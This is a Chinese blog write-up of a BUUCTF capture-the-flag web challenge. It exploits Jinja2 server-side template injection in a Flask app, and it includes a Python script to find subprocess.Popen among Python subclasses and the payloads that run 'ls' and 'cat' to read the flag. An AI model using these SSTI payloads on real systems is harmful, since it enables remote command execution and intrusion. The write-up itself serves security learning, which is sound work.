「配枪朱丽叶。」 「配枪朱丽叶。」
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
    • 学习笔记
    • 工具分享
    • 漏洞复现
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
    • 学习笔记
    • 工具分享
    • 漏洞复现
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
我的主页 › 靶场 › BUUCTF › [CSCCTF 2019 Qual]FlaskLight1 min read
#BUUCTF#

[CSCCTF 2019 Qual]FlaskLight1 min read

4月前
79 0

源代码有两处提示:

  <!-- Parameter Name: search -->
  <!-- Method: GET -->

输入?search={{7*7}}出现以下内容说明存在模板注入漏洞:

You searched for:
49

爆出所有的类:

{{''.__class__.__mro__[2].__subclasses__()}}

查询subprocess.Popen在哪:

import requests
import re
import html

url = "http://f2c96b25-5710-4057-b5e2-12e39acf4921.node3.buuoj.cn/?search={{%27%27.__class__.__mro__[2].__subclasses__()}}"
s = requests.get(url).text
result = re.findall("\<h2\>You searched for:\<\/h2\>\\n  \<h3\>\[(.*?)\<\/h3\>",s,re.S)
#反转义字符串
result = html.unescape(result[0])[:-1]
result = result.split(', ')
print(result.index("<class 'subprocess.Popen'>"))

运行得到结果为:258。

{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

得到flag:

{{''.class.mro[2].subclasses()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
0 0
Shaw Root
# buuctf# ssti# web
相关文章
[Vulnhub]GoldenEye: 1靶机通关记录
[SUCTF 2019]EasyWeb
[BMZCTF]WEB_ezphp
通过一道校赛题学习过滤单引号的注入
[CTF.SHOW]登陆就有flag
头像
Shaw Root站长
> 二月春来三月长安。
143文章 0评论 128获赞
碎碎念 : P

最近深入滴研究了微积分、线性代数和高等数学。发现“微积分”都是一声,“线性代数”都是四声,“高等数学”四声都有,数学真是好奇妙^^

随便看看:)
[CTF.SHOW]1024杯部分MISC做题记录
2月前
[CTF.SHOW]大吉大利杯-veryphp
1月前
[HackTheBox]Academy靶机通关记录
3月前
[WUSTCTF2020]B@se
10月前
《诸神之眼: Nmap网络安全审计技术揭秘》读书笔记(二)
3月前
  • 旧站
  • 我的知乎
  • Riro
  • 7i4n2h3n9
  • EDS
  • 熵增
  • 紫哥purplet
  • 夏风
  • N0vice
  • Ga1@xy
  • prontosil
  • FzWjScJ
  • Retr_0
  • L1near
  • 1p0ch
  • β-AS
  • Match
  • Dizzyk
  • Y1ng
  • 偏有宸机
  • Van1sh
  • Fstone
  • Kali’s Blog
  • Airtail
  • False
  • 魔法少女雪殇
Copyright © 2020-2021 「配枪朱丽叶。」. Designed by nicetheme. 百度统计 载入天数... 载入时分秒...